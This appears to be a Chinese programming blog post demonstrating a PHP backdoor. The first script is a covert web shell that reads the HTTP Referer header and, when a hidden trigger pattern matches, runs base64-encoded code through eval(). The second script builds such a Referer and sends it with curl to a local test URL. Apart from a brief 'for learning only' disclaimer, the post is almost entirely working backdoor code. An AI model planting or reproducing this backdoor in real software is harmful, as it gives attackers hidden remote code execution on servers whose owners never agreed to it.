龙盟编程博客 | 无障碍搜索 | 云盘搜索神器
快速搜索
主页 > web编程 > php编程 >

php后门程序演示

时间:2014-07-22 14:49来源: 作者: 点击:
分享到:
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果。本地测试结果如下图。本程序只作为学习作用,请勿拿去做坏事。
通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果。
本地测试结果如下图。
本程序只作为学习作用,请勿拿去做坏事。
<?php
//1.php
header('Content-type:text/html;charset=utf-8');
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10' && count($a) == 9) {
   eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}

2. [代码][PHP]代码     跳至 [1] [2] [全屏预览]

<?php
//2.php
header('Content-type:text/html;charset=utf-8');
//要执行的代码
$code = <<<CODE
phpinfo();
CODE;
//进行base64编码
$code = base64_encode($code);
//构造referer字符串
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url = 'http://localhost/test1/1.php';
$ch = curl_init();
$options = array(
    CURLOPT_URL => $url,
    CURLOPT_HEADER => FALSE,
    CURLOPT_RETURNTRANSFER => TRUE,
    CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echo curl_exec($ch);

3. [图片] QQ截图20130509103236.jpg    

精彩图集

赞助商链接